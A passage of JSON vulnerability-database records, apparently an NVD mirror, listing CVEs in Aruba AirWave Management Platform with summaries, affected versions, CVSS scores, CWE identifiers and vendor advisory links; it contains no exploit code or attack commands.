      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2022-12-08 16:15
Modified
2024-11-21 07:15
Summary
Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1919829E-4325-4155-9171-FE9F3AA987B4",
              "versionEndIncluding": "8.2.15.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Vulnerabilities in the AirWave Management Platform web-based management interface exist which expose some URLs to a lack of proper access controls. These vulnerabilities could allow a remote attacker with limited privileges to gain access to sensitive information and/or change network configurations with privileges at a higher effective level in Aruba AirWave Management Platform version(s): 8.2.15.0 and below.\n\n"
    },
    {
      "lang": "es",
      "value": "Existen vulnerabilidades en la interfaz de administraci\u00f3n basada en web de AirWave Management Platform que exponen algunas URL a una falta de controles de acceso adecuados. Estas vulnerabilidades podr\u00edan permitir que un atacante remoto con privilegios limitados obtenga acceso a informaci\u00f3n confidencial y/o cambie las configuraciones de red con privilegios en un nivel efectivo m\u00e1s alto en las versiones de la plataforma de administraci\u00f3n Aruba AirWave: 8.2.15.0 y anteriores."
    }
  ],
  "id": "CVE-2022-37917",
  "lastModified": "2024-11-21T07:15:22.753",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-12-08T16:15:11.483",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2022-019.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote reflected cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of certain components of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the AirWave management interface.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote reflected cross-site scripting (xss) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the web-based management interface of AirWave could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of certain components of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the AirWave management interface."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de tipo cross-site scripting (xss) reflejadas de forma remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00eda permitir a un atacante remoto conducir un ataque de tipo cross-site scripting (XSS) reflejado contra un usuario de determinados componentes de la interfaz.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar c\u00f3digo script arbitrario en el navegador de la v\u00edctima en el contexto de la interfaz de administraci\u00f3n de AirWave"
    }
  ],
  "id": "CVE-2021-26967",
  "lastModified": "2024-11-21T05:57:08.323",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.657",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 19:15
Modified
2024-11-21 05:54
Summary
A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de deserializaci\u00f3n no segura remota en Aruba AirWave Management Platform versiones anteriores a la 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25151",
  "lastModified": "2024-11-21T05:54:27.460",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T19:15:08.493",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-29 12:15
Modified
2024-11-21 06:00
Summary
A remote URL redirection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote URL redirection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de redireccionamiento abierto de una URL remota en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-29137",
  "lastModified": "2024-11-21T06:00:45.777",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-29T12:15:10.360",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-601"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-28 19:15
Modified
2024-11-21 05:54
Summary
A remote SQL injection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote SQL injection vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de inyecci\u00f3n SQL remota en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25153",
  "lastModified": "2024-11-21T05:54:27.677",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-28T19:15:08.527",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an authenticated remote attacker to improperly access and modify devices and management user details. A successful exploit would consist of an attacker using a lower privileged account to change management user or device details. This could allow the attacker to escalate privileges and/or change network details that they should not have access to.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an authenticated remote attacker to improperly access and modify devices and management user details. A successful exploit would consist of an attacker using a lower privileged account to change management user or device details. This could allow the attacker to escalate privileges and/or change network details that they should not have access to."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de omisi\u00f3n de restricci\u00f3n de autenticaci\u00f3n remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Una vulnerabilidad en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00eda permitir a un atacante remoto autenticado acceder y modificar de manera inapropiada dispositivos y detalles del usuario de administraci\u00f3n.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito consistir\u00eda en que un atacante usar\u00e1 una cuenta poco privilegiada para cambiar los detalles del dispositivo o del usuario de administraci\u00f3n.\u0026#xa0;Esto podr\u00eda permitir al atacante escalar privilegios y/o cambiar detalles de la red a los que no deber\u00eda tener acceso"
    }
  ],
  "id": "CVE-2021-26964",
  "lastModified": "2024-11-21T05:57:08.000",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.467",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-04-29 11:15
Modified
2024-11-21 05:54
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9692D1CE-E2C6-4B6E-BF21-4A15A8621E1D",
              "versionEndExcluding": "8.2.12.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de tipo XML external entity remota en Aruba AirWave Management Platform versiones anteriores a 8.2.12.1.\u0026#xa0;Aruba ha publicado parches para AirWave Management Platform que abordan esta vulnerabilidad de seguridad"
    }
  ],
  "id": "CVE-2021-25163",
  "lastModified": "2024-11-21T05:54:28.800",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 4.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-04-29T11:15:08.987",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 17:15
Modified
2024-11-21 05:57
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 una vulnerabilidad de ejecuci\u00f3n de comandos arbitraria autenticada remota en Aruba AirWave Management Platform versiones: anteriores a 8.2.12.0.\u0026#xa0;Unas vulnerabilidades en la interfaz de administraci\u00f3n basada en web de AirWave podr\u00edan permitir a usuarios autenticados remoto ejecutar comandos arbitrarios en el host subyacente.\u0026#xa0;Una explotaci\u00f3n con \u00e9xito podr\u00eda permitir a un atacante ejecutar comandos arbitrarios como un usuario poco privilegiado en el sistema operativo subyacente, conllevando a un compromiso parcial del sistema"
    }
  ],
  "id": "CVE-2021-26970",
  "lastModified": "2024-11-21T05:57:08.640",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-03-05T17:15:14.810",
  "references": [
    {
      "source": "security-alert@hpe.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
    }
  ],
  "sourceIdentifier": "security-alert@hpe.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2021-03-05 16:15
Modified
2024-11-21 05:57
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise.
Impacted products
Vendor Product Version
arubanetworks airwave *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:arubanetworks:airwave:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F6CD495-ED12-4332-8806-647134C1E15D",
              "versionEndExcluding": "8.2.12.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave CLI could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to full system compromise."
    },
    {
      "lang": "es",
